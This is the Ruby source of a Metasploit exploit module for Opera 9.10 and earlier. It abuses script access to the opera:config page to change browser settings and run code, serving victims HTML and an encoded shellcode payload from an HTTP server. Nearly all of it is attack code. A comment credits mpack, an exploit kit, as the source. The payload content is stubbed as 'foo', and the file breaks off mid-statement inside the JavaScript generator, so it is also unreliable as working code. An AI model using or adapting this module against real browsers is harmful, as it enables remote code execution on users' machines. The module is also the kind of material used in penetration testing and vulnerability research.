## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::OPERA, :ua_ver => "1.0", :os_name => [ OperatingSystems::WINDOWS, OperatingSystems::LINUX ], :javascript => true, :rank => ExcellentRanking, # reliable exe writer :vuln_test => nil, }) def initialize(info = {}) super(update_info(info,{ 'Name' => 'Opera 9 Configuration Overwrite', 'Description' => %q{ Opera web browser in versions <= 9.10 allows unrestricted script access to its configuration page, opera:config, allowing an attacker to change settings and potentially execute arbitrary code. }, 'License' => BSD_LICENSE, 'Author' => [ 'egypt', # stolen from mpack ], 'Version' => '$Revision: 6655 $', 'References' => [ ], 'Payload' => { 'ExitFunc' => 'process', 'Space' => 2048, 'DisableNops' => true, 'BadChars' => " |'<>&", }, 'Targets' => [ #[ 'Opera < 9.10 Windows', # { # 'Platform' => 'win', # 'Arch' => ARCH_X86, # } #], [ 'Opera < 9.10 Unix Cmd', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, } ], ], # Not sure when this was disclosed but it's been known since at # least March 5, 2007, since that's the release date on the version # of mpack I stole this from. 'DisclosureDate' => 'Mar 5 2007' })) end def on_request_uri(cli, request) case request.uri when /payload$/ print_status("Generating payload for #{target} #{target.platform}") # Re-generate the payload if ((p = regenerate_payload(cli)) == nil) print_error("Payload generation failed, 404ing request for #{request.uri}") send_not_found(cli) return end # NOTE: Change this to the new API when commiting to trunk #content = Msf::Util::EXE.to_win32pe(p.encoded) #content = Rex::Text.to_win32pe(p.encoded) content = "foo" print_status("Generated #{content.length} bytes") headers = { 'Content-Type' => 'application/octet-stream' } when get_resource print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") content = "" headers = { 'Content-Type' => 'text/html' } else print_status("404ing request for #{request.uri}") send_not_found(cli) return end send_response_html(cli, content, headers) end def generate_evil_js(cli, request) # There are a bunch of levels of quotes here, so the easiest way to # make everything line up is to hex escape the command to run p = regenerate_payload(cli).encoded #print_status(p) shellcode = Rex::Text.to_hex(p, "%") js = <